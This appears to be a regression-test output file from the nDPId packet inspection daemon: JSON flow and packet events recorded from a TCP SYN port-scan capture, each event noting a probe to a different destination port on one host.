+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsinkAAC8GjvmsEAAIQA2GNIzTFajdU4MZAAAAAGACEAAS5AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrkAADEGWLmsEAAIQA2GNIzTaXjdU4MZAAAAAGACCADHEwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsP2QAADMG1g6sEAAIQA2GNIzTBGTdU4MZAAAAAGACEAAkKAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/5IAAC0GG+CsEAAIQA2GNIzTDtjdU4MZAAAAAGACCAAhtAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zQAADIGNz6sEAAIQA2GNIzTB7TdU4MZAAAAAGACDAAk2AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs75sAADEGJ9esEAAIQA2GNIzTBCXdU4MZAAAAAGACCAAsZwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsr2oAADsGXgisEAAIQA2GNIzTAGrdU4MZAAAAAGACEAAoIgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmoAACcGcwisEAAIQA2GNIzTBBXdU4MZAAAAAGACEAAkdwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsTr8AACYG07OsEAAIQA2GNIzTBIvdU4MZAAAAAGACDAAoAQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6UAAADcGKDKsEAAIQA2GNIzTCirdU4MZAAAAAGACEAAeYgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4BwAAC0GO1asEAAIQA2GNIzTBd3dU4MZAAAAAGACCAAqrwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsWGcAACoGxgusEAAIQA2GNIzSlZTdUoMYAAAAAGACDACW+gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAshTcAADYGjTusEAAIQA2GNIzSAaDdUoMYAAAAAGACDAAq7wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsW+wAADIGuoasEAAIQA2GNIzSB87dUoMYAAAAAGACDAAkwQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4OUAADYGMY2sEAAIQA2GNIzSABTdUoMYAAAAAGACDAAsewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsLA4AAC8G7WSsEAAIQA2GNIzSBQfdUoMYAAAAAGACEAAjiAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oAAADEGLPKsEAAIQA2GNIzS387dUoMYAAAAAGACCABQwAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdcAACkGoZusEAAIQA2GNIzSAh3dUoMYAAAAAGACCAAucgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlkAADIG2BmsEAAIQA2GNIzSBUjdUoMYAAAAAGACDAAnRwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3cAACgGDPysEAAIQA2GNIzSDNPdUoMYAAAAAGACBAAnvAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsMosAADIG4+esEAAIQA2GNIzSBHndUoMYAAAAAGACDAAoFgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5AAADIGVuKsEAAIQA2GNIzSCI\/dUoMYAAAAAGACDAAkAAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAszeUAADsGP42sEAAIQA2GNIzSTiDdUoMYAAAAAGACEADabgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zcAADMGGjusEAAIQA2GNIzSBAvdUoMYAAAAAGACEAAkhAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsJtYAADsG5pysEAAIQA2GNIzSAFjdUoMYAAAAAGACEAAoNwAAAgQFtA=="} 